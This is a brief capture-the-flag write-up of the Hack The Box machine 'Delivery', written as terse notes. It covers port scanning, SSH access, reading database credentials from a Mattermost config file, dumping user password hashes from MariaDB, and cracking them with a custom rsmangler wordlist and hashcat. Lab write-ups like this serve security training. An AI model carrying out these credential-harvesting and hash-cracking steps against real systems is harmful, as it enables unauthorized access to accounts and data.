Delivery - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.222
Exploitation
- Abusing Support Ticket System
![[Pasted image 20250512134153.png]]
- Conect ssh
ssh maildeliverer@10.10.10.222
Post-exploitation
- Check all listening ports
ss -nltp
- Leaked config data
cat /opt/mattermost/config/config.json | grep 3306
- Conect to MariaDB
mysql -u mmuser -p
select username,password from Users;
- Generate custom dictionary with PleaseSubscribe! variants
echo "PleaseSubscribe\!"> data.txt
rsmangler -f data.txt -o custom_dict.txt
hashcat -m 3200 hash.txt custom_dict.txt
